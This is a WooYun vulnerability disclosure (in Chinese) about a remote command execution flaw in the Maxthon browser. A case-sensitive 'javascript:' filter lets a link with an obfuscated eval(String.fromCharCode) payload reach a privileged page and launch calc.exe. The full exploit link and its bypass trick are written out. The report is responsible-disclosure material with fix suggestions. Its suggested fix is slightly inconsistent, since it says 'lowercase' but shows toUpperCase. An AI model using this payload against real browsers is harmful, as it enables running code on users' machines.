当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177012

漏洞标题:利用傲游浏览器远程命令执行(代码修复不当/导致XSS绕过)

相关厂商:傲游

漏洞作者: q601333824

提交时间:2016-02-19 14:55

修复时间:2016-05-19 15:30

公开时间:2016-05-19 15:30

漏洞类型:远程代码执行

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-19: 细节已通知厂商并且等待厂商处理中
2016-02-19: 厂商已经确认,细节仅向厂商公开
2016-02-22: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

简要描述:

1.才发现认真看代码的话比Fuzz轻松(就算不会英文,知道代码什么意思就行)......
2.别加好友问我漏洞从哪里来的,在网吧网管不是白当的,因为除了修电脑泡面,剩下时间很多,也没闲下来,一直在网上学编程..........
-------------------------------------------------------------------------------------------------------
3.出自《NO GAME NO LIFE游戏人生》---正因为是最弱,所以才理解智慧之强,无限接近于零,却又不等于零的可能性.

详细说明:

1.最新版遨游浏览器

1.png



2.先看他的漏洞

http://**.**.**.**/bugs/wooyun-2015-0140915


3.官方对XSS的修复如下图

2.png


4.我直接贴出代码,这个是官方的修复的代码

function getRealLocation() {
		var loc = location.toString();
		var index = loc.indexOf('?');
		loc = (index > -1) ? loc.substr(index + 1) : "";
		if (loc.substr(0, 11) == 'javascript:') {
			loc = 'about:blank';
		}
		return loc;
  }



5.从代码可以看出,官方获取URL地址之后,等号进行分割,然后取等号后面的数值,然后在选出前11个字符,刚好是javascript:,如果存在则loc=about:blank
6.这种过滤我小白都看出猫腻了,如果我这个时候,把开通的J字母大写,不就不走这个流程,直接return loc

Javascript:


7.看吧,弹出计算器了

3.png



---------------------------------------------------------------------------------------------
8.一个条件达成了,弹出计算器,但是还没完,经过测试,要想跳转到这个特权全被限制了,但是如果在同域进行跳转不会拦截
9.所以我在阅读器插入

<a href="mx://res/error/danger_site.htm?Javascript:eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,115,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,115,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,115,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,67,58,47,119,105,110,100,111,119,115,47,115,121,115,116,101,109,51,50,47,99,97,108,99,46,101,120,101,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))" sr_c="mx://res/error/danger_site.htm?Javascript:eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,115,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,115,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,115,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,67,58,47,119,105,110,100,111,119,115,47,115,121,115,116,101,109,51,50,47,99,97,108,99,46,101,120,101,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))" target="_self">点我点我点我</a>



4.png


10.有一点要注意,超链接插入要这种形式,要加上target="_self",因为默认情况下是新窗口打开,这样会拦截,必须加上target="_self"属性,让连接从当前框架打开就不会拦截了................

<a href="mx://res/error/danger_site.htm?JAVAScript:alert(document.domain)"  target="_self">




漏洞证明:


1.漏洞证明看上面
2.

3.png


3.顺便修正以前别人的误区,就算不是xml后缀也可以解析称XML,在PHP开头加上,只要声明文档类型就行

header("Content-Type: application/rss+xml");


5.png


4.这里我用的是thinkphp引入的模版

修复方案:


1.推荐修复用这个代码,转换成小写再进行判断..............

str.toUpperCase()


2.至于从自己框架内跳转不拦截,推荐修复方法用所以连接统一用相对地址,我看过html5的标签介绍,可以试试这个标签

<base>


--------------------------------------------------------------------------------
3.别吐槽我为啥只是个网管,我投了简历没人回,因为我写了中专,人家连我会啥也不问了

版权声明:转载请注明来源 q601333824@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-02-19 15:21

厂商回复:

会在 4.9 修复

最新状态:

暂无